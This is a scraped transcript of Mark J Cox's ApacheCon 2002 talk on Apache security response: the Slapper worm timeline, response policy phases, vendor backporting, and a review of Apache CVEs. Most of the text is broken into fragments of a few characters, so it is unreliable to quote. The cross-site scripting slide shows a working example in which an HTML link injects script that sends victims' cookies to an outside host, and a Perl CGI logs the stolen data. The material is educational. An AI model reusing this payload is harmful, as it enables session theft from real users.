Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to...
Transcript of Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to...
Apa
che
Secu
rity
Sec
rets
: R
evea
led
for
Apa
cheC
on 2
00
2, L
as V
egas
Mar
k J
Cox
revi
sion
1w
ww
.aw
e.co
m/m
ark/
apco
n2
00
2
Qu
ick
Intr
odu
ctio
nW
ho a
m I
?•
Why
do
you
care
?•
Wha
t is
Secu
rity
Resp
onse
Why
do
we
need
it?
•Re
d H
at, A
pach
e, O
penS
SL
Wha
t w
ill w
e co
ver?
Wha
t w
on’t
we
cove
r?To
ns o
f ex
tra
info
in t
he h
ando
ut•
also
ava
ilabl
e at
ww
w.a
we.
com
/mar
k/ap
con2
002/
Slap
per
Wor
mU
se a
n ex
ampl
e to
illu
stra
te s
ome
poin
tsSl
appe
r w
orm
fou
nd S
epte
mbe
r 20
02Ex
ploi
ted
Ope
nSSL
vul
nera
bilit
y•
But t
hrou
gh A
pach
e, th
eref
ore
inte
rest
ing
Look
at
the
timel
ine
July
200
2A
ugus
tSe
ptem
ber
July
19:
Vul
nera
bilit
ies i
n O
penS
SL fo
und
in
code
aud
itJu
ly 2
3: C
ERT
cont
act u
s with
inde
pend
ent
verif
icat
ion
July
28:
Lin
ux a
nd O
penS
SL v
endo
rs n
otifi
ed
July
30:
Ope
nSSL
upd
ates
and
ann
ounc
emen
t
July
30:
Ven
dor u
pdat
es a
vaila
ble
Sept
13:
Firs
t exp
loit
(as a
wor
m)
Sept
17:
Ful
l rem
ote
expl
oit
45 d
ays
Com
mer
cial
or
Ope
n S
ourc
e?O
penS
SL•
Esta
blis
hed
proc
ess
•0
day
“win
dow
of k
now
n ris
k”•
Gav
e tim
e fo
r ad
min
istr
ator
s to
upg
rade
SSL-
C an
d O
penS
SL s
hare
com
mon
his
tory
•Si
mila
r vu
lner
abili
ties
affe
cted
SSL
-C•
The
timel
ine
is in
tere
stin
g
Aug
ust 2
002
Sept
embe
rO
ctob
er
July
30:
Ope
nSSL
upd
ates
and
ann
ounc
emen
t
July
30:
Ven
dor u
pdat
es a
vaila
ble
Aug
8: R
SA a
nnou
nce
issu
e
Aug
22:
RSA
mak
e fix
ed li
brar
ies a
vaila
ble
Sept
10:
Cov
alen
t 2.0
pac
kage
s
23 d
ays
70+
days
Sept
13:
Firs
t exp
loit
(as a
wor
m)
Sept
17:
Ful
l rem
ote
expl
oit
Wh
o w
as v
uln
erab
le?
Peop
le w
ho d
idn’
t up
date
the
ir sy
stem
s•
Why
did
n’t t
hey
upgr
ade?
Aban
done
dIn
stal
l and
For
get
Cry
Wol
f (t
oo m
uch
info
rmat
ion)
Inco
rrec
t or
mis
lead
ing
info
rmat
ion
Iner
tia, t
oo h
ard
to u
pgra
deTh
ey t
houg
ht t
hey
alre
ady
had
•H
ow c
an w
e he
lp?
Bett
er q
ualit
y in
form
atio
nEa
sier
to
upgr
ade
Ever
ybod
y th
ough
t Som
ebod
y w
ould
do
it. A
nybo
dy c
ould
hav
e do
ne it
But
Nob
ody
did.
And
in th
e en
d Ev
eryb
ody
got m
ad a
t So
meb
ody
Beca
use.
.. No
body
did
wha
t Any
body
cou
ld h
ave
done
.
Rel
ease
tak
e u
p
Se
cr
et
: Ke
ep
yo
ur
Sy
st
em
u
p t
o d
at
e
Secu
rity
Pol
icy
Why
bot
her?
Secu
rity
resp
onse
pol
icy
for
Apac
he•
Aler
t Pha
se•
Anal
ysis
Pha
se•
Resp
onse
Pha
se•
Mai
nten
ance
Pha
se
Assu
mpt
ions
•Ju
st A
pach
e•
Not
from
a v
endo
r
Ale
rt P
has
eW
here
to
get
your
in
form
atio
n•
How
the
qual
ity v
arie
sKe
ep n
otes
Apac
he m
ailin
g lis
tsCE
RT
CCBu
gtra
qFu
ll D
iscl
osur
eAp
ache
Wee
kAp
ache
web
site
Secu
rity
Site
s
An
alys
is P
has
eW
hat
is t
he is
sue
all
abou
t?H
ow d
oes
it af
fect
you
•Im
pact
on
your
or
gani
satio
n•
Thre
at a
sses
smen
tReq
uire
s D
etec
tive
wor
kReq
uire
s tr
uste
d in
form
atio
n so
urce
s•
Chin
ese
Whi
sper
s•
Pres
s FU
D
MAR
C
Pre
ss c
onfu
sion
Spot
mis
take
s•
“was
vul
nera
ble”
•O
ne X
SS v
ulne
rabi
lity
•W
ildca
rd D
NS
•v1
.3 w
asn’
t vul
nera
ble
•M
atth
ew d
idn’
t pat
ch•
“arb
itrar
y ac
tions
”•
didn
’t bo
ther
to a
sk u
sTh
is a
lway
s ha
ppen
s•
even
whe
n th
ey a
sk u
s
Slap
per
Pre
ss
San
s FU
D
Se
cr
et
: Se
cu
rit
y c
om
pa
nie
s h
av
e
th
eir
ow
n a
ge
nd
as
--M
SNB
C 1
6 Se
p 20
02
Apa
che
and
CV
ELo
ts o
f ve
ndor
s sh
ip A
pach
eLo
ts o
f ve
ndor
s re
port
on
Apac
he is
sues
•As
do
the
pres
s•
As d
o w
eekl
y jo
urna
ls
Com
mon
Vul
nera
bilit
ies
and
Expo
sure
s•
Mitr
e•
Dic
tiona
ry•
Cros
s-re
fere
nce
with
vul
nera
bilit
y da
taba
ses
•St
anda
rdis
atio
n an
d N
orm
alis
atio
n
An
alys
isTh
ings
to
get
(fro
m t
he a
dvis
ory)
•Vu
lner
abili
ty n
ame
and
iden
tifie
rs•
Vers
ions
affe
cted
•Co
nfig
urat
ion
requ
ired
•Im
pact
and
sev
erity
•W
ork-
arou
nd•
Patc
hes
Get
tin
g to
kn
ow y
ouW
hat
are
you
runn
ing?
•N
map
Are
you
vuln
erab
le?
•Ex
ploi
ts•
Nes
sus
Dep
ende
ncie
s
Se
cr
et
: Go
to
th
e s
ou
rc
e
Res
pon
se P
has
eW
hat
are
you
goin
g to
do
abou
t it
•W
hat i
s th
e im
pact
?•
Wha
t pol
icie
s af
fect
it•
Upgr
ade
to th
e la
test
ver
sion
?•
or P
hase
d ap
proa
ch?
•or
Pat
ch?
•or
do
noth
ing?
But
mak
e su
re y
our
sour
ce is
n’t
a tr
ojan
Troj
an s
ourc
eIt
’s h
appe
ned
to O
penS
SH a
nd S
endm
ail
•Bu
t not
to A
pach
eYe
t
Ch
ecki
ng
the
sou
rce
Secu
rity
Pol
icy
Mai
nten
ance
Pha
seSt
eps
for
reco
verin
g fr
om c
ompr
omis
e•
LKM
roo
tkits
•H
ope
you
kept
a b
acku
p
Se
cr
et
: as
su
me
yo
u a
re
g
oin
g t
o g
et
ha
ck
ed
Se
cr
et
: Ke
ep
Ba
ck
up
s
Ven
dor
vers
ion
sPo
sitiv
es•
Wor
ks o
ut o
f the
box
•Cu
stom
ised
for
the
OS
•Te
sted
, QA’
d•
The
kitc
hen
sink
•O
ne s
ourc
e of
sec
urity
in
form
atio
n•
Auto
mat
ic u
pdat
es•
Inst
all a
nd fo
rget
•Ac
coun
tabi
lity
Trus
t•
Trus
t the
ven
dors
an
alys
is•
Trus
t the
ven
dor
to
prod
uce
timel
y cr
itica
l fix
esR
isks
•M
ix a
nd m
atch
•Fo
rced
to u
pgra
de•
Wha
t did
they
fix
Se
cr
et
: Tr
us
t y
ou
r v
en
do
r(i
f y
ou
do
n’t
th
en
ch
an
ge
v
en
do
r!)
Bac
kpor
tin
gCo
nfus
es e
very
one
It’s
no
long
er A
pach
e!So
why
do
it?•
Cust
omer
s de
man
d it
•To
o m
any
new
feat
ures
•Ce
rtifi
catio
n•
Qui
cker
and
pai
nles
s up
grad
es
Prob
lem
s•
Vers
ion
num
ber
does
n’t
chan
ge Conf
uses
too
lsCo
nfus
es N
essu
sCo
nfus
es u
sers
•Ve
ndor
s ha
ve th
eir
own
pack
age
vers
ioni
ngin
cons
iste
nt
Ope
n s
ourc
e is
mor
e se
cure
?“M
any
eyes
”•
How
man
y of
you
hav
e au
dite
d Ap
ache
?•
Ope
nSSL
vul
nera
bilit
ies
“eas
ily s
pott
ed”
•Th
ere
are
othe
r be
nefit
sN
o ne
ed f
or F
UD
Apac
he’s
his
tory
•Ju
st A
pach
e•
Nor
mal
isin
g to
CVE
Apa
che
1.3
.0 t
o 1
.3.2
7
Typ
e of
issu
eSe
veri
tyN
umbe
r of
vuln
erab
ilitie
sD
enia
l of S
ervi
ceH
igh
5Sh
ow a
dire
ctor
y lis
ting
Low
4R
ead
files
on
the
syst
emH
igh
3R
emot
e ar
bitra
ry c
ode
exec
utio
nH
igh
2C
ross
Site
Scr
iptin
gM
ediu
m2
Loca
l priv
ilege
esc
alat
ion
Med
ium
1R
emot
e R
oot E
xplo
itH
igh
0
Typ
e of
issu
eSe
veri
tyW
ho a
nd W
hen
Show
the
sour
ce to
CG
I scr
ipts
Med
ium
SuSE
Lin
ux, 2
000
Show
file
s in
/usr
/doc
Low
Deb
ian
Linu
x, 1
999
SuSE
Lin
ux, 2
000
Rea
d an
d w
rite
any
file
in d
ocro
otH
igh
SuSE
Lin
ux 2
000
Rea
d .h
tacc
ess f
iles
Med
ium
Cob
alt,
2000
Run
arb
itrar
y co
mm
ands
rem
otel
yH
igh
IBM
, 200
0
Se
cr
et
: Ap
ac
he
is a
lr
ea
dy
p
re
tt
y s
ec
ur
e
Den
ial o
f S
ervi
ceO
nly
inte
rest
ing
if it’
s ea
sy t
o do
•Bu
gs
Dire
ctiv
es t
o he
lp s
top
regu
lar
DO
S•
RLim
it* L
imitR
eque
st*
CV
ET
itle
Des
crip
tion
CA
N-
2001
-134
2D
enia
l of s
ervi
ce a
ttack
on W
in32
and
OS2
A c
lient
subm
ittin
g a
care
fully
con
stru
cted
UR
I cou
ld c
ause
aG
ener
al P
rote
ctio
n Fa
ult i
n a
child
pro
cess
, brin
ging
up
a m
essa
gebo
x w
hich
wou
ld h
ave
to b
e cl
eare
d by
the
oper
ator
to re
sum
e.no
neD
enia
l of s
ervi
ce a
ttack
on W
in32
Ther
e ha
ve b
een
a nu
mbe
r of i
mpo
rtant
secu
rity
fixes
to A
pach
eon
Win
dow
s. Th
e m
ost i
mpo
rtant
is th
at th
ere
is m
uch
bette
rpr
otec
tion
agai
nst p
eopl
e try
ing
to a
cces
s spe
cial
DO
S de
vice
nam
es (s
uch
as "
nul"
).C
AN
-19
99-1
199
Mul
tiple
hea
der D
enia
lof
Ser
vice
vul
nera
bilit
yA
pro
blem
exi
sts w
hen
a cl
ient
send
s a la
rge
num
ber o
f hea
ders
with
the
sam
e he
ader
nam
e. A
pach
e us
es u
p m
emor
y fa
ster
than
the
amou
nt o
f mem
ory
requ
ired
to si
mpl
y st
ore
the
rece
ived
dat
aits
elf.
none
Den
ial o
f ser
vice
atta
cks
Apa
che
1.3.
2 ha
s bet
ter p
rote
ctio
n ag
ains
t den
ial o
f ser
vice
atta
cks.
Get
doc
root
dir
ecto
ry li
stin
gs
Shou
ld b
e a
min
or im
pact
•As
long
as
you
don’
t do
som
ethi
ng s
illy
Dis
able
mod
_aut
oind
ex u
nles
s yo
u ne
ed it
CV
ET
itle
Des
crip
tion
CA
N-
2001
-07
29
Req
uest
s can
cau
se d
irect
ory
listin
g to
be
disp
laye
dA
vul
nera
bilit
y w
as fo
und
in th
e W
in32
por
t of A
pach
e1.
3.20
. A c
lient
subm
ittin
g a
very
long
UR
I cou
ld c
ause
adi
rect
ory
listin
g to
be
retu
rned
CA
N-
2001
-07
31
Mul
tivie
ws c
an c
ause
adi
rect
ory
listin
g to
be
disp
laye
dW
hen Multiviews
are
use
d to
neg
otia
te th
e di
rect
ory
inde
x. In
som
e co
nfig
urat
ions
, req
uest
ing
a U
RI w
ith a
QUERY_STRING
of M=D
cou
ld re
turn
a d
irect
ory
listin
gC
AN
-20
01-
0925
Req
uest
s can
cau
se d
irect
ory
listin
g to
be
disp
laye
dTh
e de
faul
t ins
talla
tion
can
lead
mod_negotiation
and
mod_dir
or mod_autoindex
to d
ispl
ay a
dire
ctor
ylis
ting
if a
very
long
pat
h w
as c
reat
ed a
rtific
ially
by
usin
gm
any
slas
hes.
CV
E-20
00-
0505
Req
uest
s can
cau
se d
irect
ory
listin
g to
be
disp
laye
d on
NT
A u
ser t
o vi
ew th
e lis
ting
of a
dire
ctor
y in
stea
d of
the
defa
ult
HTM
L pa
ge b
y se
ndin
g a
care
fully
con
stru
cted
requ
est.
Ret
urn
arb
itra
ry f
iles
It’s
act
ually
har
d to
do
•M
uch
easi
er t
hrou
gh a
bad
CG
I or
PH
P sc
ript
•Us
e a
CHRO
OT
jail
CV
ET
itle
Des
crip
tion
CA
N-
2000
-09
13
Rew
rite
rule
s tha
t inc
lude
refe
renc
es a
llow
acc
ess t
o an
y fil
eTh
e R
ewrit
e m
odul
e, mod_rewrite
, can
allo
w a
cces
sto
any
file
on
the
web
ser
ver.
The
vuln
erab
ility
occ
urs
only
with
cer
tain
spec
ific
case
s of u
sing
regu
lar
expr
essi
on re
fere
nces
in RewriteRule
dire
ctiv
esC
AN
-20
00-
1204
Mas
s virt
ual h
ostin
g ca
n di
spla
yC
GI s
ourc
eA
secu
rity
prob
lem
for u
sers
of t
he m
ass v
irtua
l hos
ting
mod
ule,
mod_vhost_alias
, cau
ses t
he so
urce
to a
CG
I to
be se
nt if
the cgi-bin
dire
ctor
y is
und
er th
edo
cum
ent r
oot.
How
ever
, it i
s not
nor
mal
to h
ave
your
cgi-b
in d
irect
ory
unde
r a d
ocum
ent r
oot.
CA
N-
2000
-12
06
Mas
s virt
ual h
ostin
g se
curit
y is
sue
A se
curit
y pr
oble
m c
an o
ccur
for s
ites u
sing
mas
s nam
e-ba
sed
virtu
al h
ostin
g (u
sing
the
new
mod_vhost_alias
mod
ule)
or w
ith sp
ecia
lmod_rewrite
rule
s.
Arb
itra
ry c
ode
exec
uti
onN
ight
mar
e sc
enar
ioIt
’s o
nly
happ
ened
ON
CEto
Apa
che
1.3
•an
d th
en it
was
lim
ited
to s
ome
plat
form
s•
and
you
didn
’t ge
t roo
t
CVE
Title
Desc
riptio
nCA
N-20
02-
0392
Apac
he C
hunk
eden
codin
g vuln
erab
ility
Requ
ests
to al
l ver
sions
of A
pach
e 1.3
can
caus
e var
ious
effec
ts ra
ngin
g fro
m a r
elativ
elyha
rmles
s inc
reas
e in s
ystem
reso
urce
s thr
ough
to de
nial
of se
rvice
attac
ks an
d in s
ome c
ases
the a
bilit
y to b
e rem
otely
explo
ited.
CAN-
2002
-00
61
Win
32 A
pach
eRe
mote
com
mand
exec
utio
n
Apac
he fo
r Win
32 be
fore
1.3.2
4 and
2.0.3
4-be
ta all
ows r
emot
e atta
ckers
to ex
ecut
ear
bitra
ry co
mman
ds vi
a par
amete
rs pa
ssed
toba
tch fi
le CG
I scr
ipts.
Mit
igat
e re
mot
e ex
ploi
tsU
se a
CH
ROO
T ja
il“T
his
is th
e be
st a
ppro
ach
we
can
curr
ently
take
aga
inst
suc
h a
mon
olot
hic
piec
e of
sof
twar
e w
ith s
uch
bad
beha
viou
rs. I
t is
just
too
big
to a
udit,
so
for
simpl
e us
age,
we
are
cons
trai
ning
it
to w
ithin
that
jail.
”--
Theo
de
Raa
dt, O
penB
SD
usr/
var/
hom
e/bo
ot/
/
ww
w/
htdo
cs/
htdo
cs/
/
Loca
l pri
vile
ge e
scal
atio
nA
uniq
ue is
sue
due
to a
bug
•Lo
cal A
pach
e ui
d ca
n do
thi
ngs
as r
oot
Caus
e a
DO
SKi
ll ar
bitr
ary
proc
esse
s
•Yo
u ca
n ge
t Apa
che
uid
from
CG
I, P
erl e
tc
CV
ET
itle
Des
crip
tion
CA
N-
2002
-08
39
Shar
ed m
emor
ype
rmis
sion
s lea
d to
loca
l priv
ilege
esca
latio
n
The
perm
issi
ons o
f the
shar
ed m
emor
y us
edfo
r the
scor
eboa
rd a
llow
s an
atta
cker
who
can
exec
ute
unde
r the
Apa
che
UID
to se
nd a
sign
al to
any
pro
cess
as r
oot o
r cau
se a
loca
lde
nial
of s
ervi
ce a
ttack
.
Cro
ss S
ite
Scri
ptin
g (X
SS)
Com
plet
ely
mis
unde
rsto
od•
Lets
try
an e
xam
ple
to s
how
the
atta
ck
cons
eque
nces
CVE
Title
Desc
riptio
nCA
N-20
02-
0840
Erro
r pag
e XSS
usin
g wi
ldca
rdDN
S
Cros
s-site
scrip
ting
(XSS
) vul
nera
bilit
y in
the d
efau
lt er
ror
page
of A
pach
e 2.0
bef
ore 2
.0.43
, and
1.3.x
up to
1.3
.26,
when
Use
Cano
nica
lNam
e is “
Off”
and
supp
ort f
or w
ildca
rdDN
S is
pres
ent,
allow
s rem
ote a
ttack
ers t
o ex
ecut
e scr
ipt a
sot
her w
eb p
age v
isito
rs vi
a the
Hos
t: he
ader
.CA
N-20
00-
1205
Cros
s-site
scrip
ting
can
reve
al pr
ivate
sess
ion
info
rmati
on
Apac
he w
as vu
lner
able
to cr
oss-s
ite sc
riptin
g iss
ues.
It wa
ssh
own
that
mali
cious
HTM
L tag
s can
be em
bedd
ed in
clien
twe
b re
ques
ts if
the s
erve
r or s
crip
t han
dlin
g th
e req
uest
does
not c
aref
ully
enco
de al
l inf
orm
ation
disp
layed
to th
e use
r.Us
ing
thes
e vul
nera
bilit
ies at
tacke
rs co
uld,
for e
xam
ple,
obtai
n co
pies
of yo
ur p
rivate
cook
ies u
sed
to au
then
ticate
you
to ot
her s
ites.
<html><h1>My cute kitten</h1>
<a href=”http://www.awe.com/env.cgi?<script>
document.location=
’http://www.moosezone.com/cute.cgi%3F’+document.cookie
</script>”>Click here to see my cute kitten</a></html>
#!/usr/bin/perl
print “Content-type: text/html\r\n\r\n”;
print “<h1>Awww…<h1><img src=cutekitten.jpg>”;
open(OUT,”>>/tmp/suckers”);
print OUT $ENV{“QUERY_STRING”};
close(OUT);
Oop
s
Se
cr
et
: Un
de
rs
ta
nd
C
ro
ss
-sit
e S
cr
ipt
ing
mod
_re
wri
te c
anon
ical
isat
ion
CVE-2
001-1
072,
August
2001
Pass
//
to m
ost
rew
rite
rule
sIn
clud
ing
ones
in o
ur o
wn
docu
men
tatio
n
Wro
ng! RewriteRule ^/somepath(.*) /otherpath$1 [R]
Rig
htRewriteRule ^/+somepath(.*) /otherpath$1 [R]
http://www.awe.com/somepath/fred
http://www.awe.com//somepath/fred
...Th
is is
n’t
fixed
!!!
Att
acks
an
d Ex
ploi
tsW
ho e
xplo
its A
pach
e?W
hat
sort
of
atta
cks
•Ta
rget
ed•
Auto
mat
edW
orm
s
Wor
m m
akeu
p•
Expl
oit p
ortio
n•
Scan
ner
port
ion
•Pa
yloa
d po
rtio
n
Apa
che
Wor
ms
Nam
eD
ate
Aff
ects
Expl
oits
Slap
per
(Lin
ux.S
lapp
er-A
,Li
nux.
Slap
per-
Wor
m,
Apa
che/
mod
_ssl
Wor
m)
13 Sept
2002
Apa
che
with
mod
_ssl
and
Ope
nSSL
on
vario
us L
inux
plat
form
s
CA
N-
2002
-06
56
Linu
x.D
evnu
ll30 Se
pt20
02
Apa
che
with
mod
_ssl
and
Ope
nSSL
on
vario
us L
inux
plat
form
s
CA
N-
2002
-06
56
Scal
per (
Ehch
apa,
PHP/
Expl
oit-A
pach
e)28 Ju
ne20
02
Apa
che
on O
penB
SDan
d Fr
eeB
SDC
AN
-20
02-
0392
Secr
ets,
fin
ally
rev
eale
dD
on’t
Pani
cM
ake
a se
curit
y po
licy
for
deal
ing
with
Apa
che
emer
genc
ies
Miti
gate
the
ris
ksRev
iew
the
sec
rets
Se
cr
et
: If
th
is is
to
o m
uc
h
ef
fo
rt
, tu
rn
of
f y
ou
r s
er
ve
r
"The
onl
y tr
uly
secu
re s
yste
m is
one
tha
t is
pow
ered
off
, cas
t in
a
bloc
k of
con
cret
e an
d se
aled
in a
lead
-line
d ro
om w
ith a
rmed
gua
rds
--
and
even
the
n I
have
my
doub
ts."
--
Gen
e Sp
affo
rd